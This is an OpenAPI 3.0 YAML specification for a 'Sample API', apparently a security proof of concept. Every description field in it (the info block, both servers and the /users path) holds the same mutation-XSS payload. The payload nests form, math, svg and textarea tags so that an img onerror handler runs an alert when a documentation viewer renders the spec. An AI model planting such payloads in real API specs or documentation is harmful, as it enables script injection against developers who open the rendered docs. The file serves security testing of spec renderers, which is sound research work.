openapi: 3.0.0
info:
  title: Sample API
  description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('AnvilSecure') src=1>"></form>
  version: 0.1.9

servers:
  - url: http://api.example.com/v1
    description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('AnvilSecure') src=1>"></form>
  - url: http://staging-api.example.com
    description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('AnvilSecure') src=1>"></form>

paths:
  /users:
    get:
      summary: Returns a list of users.
      description: <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('AnvilSecure') src=1>"></form>
      responses:
        "200": # status code
          description: A JSON array of user names
          content:
            application/json:
              schema:
                type: array
                items:
                  type: string
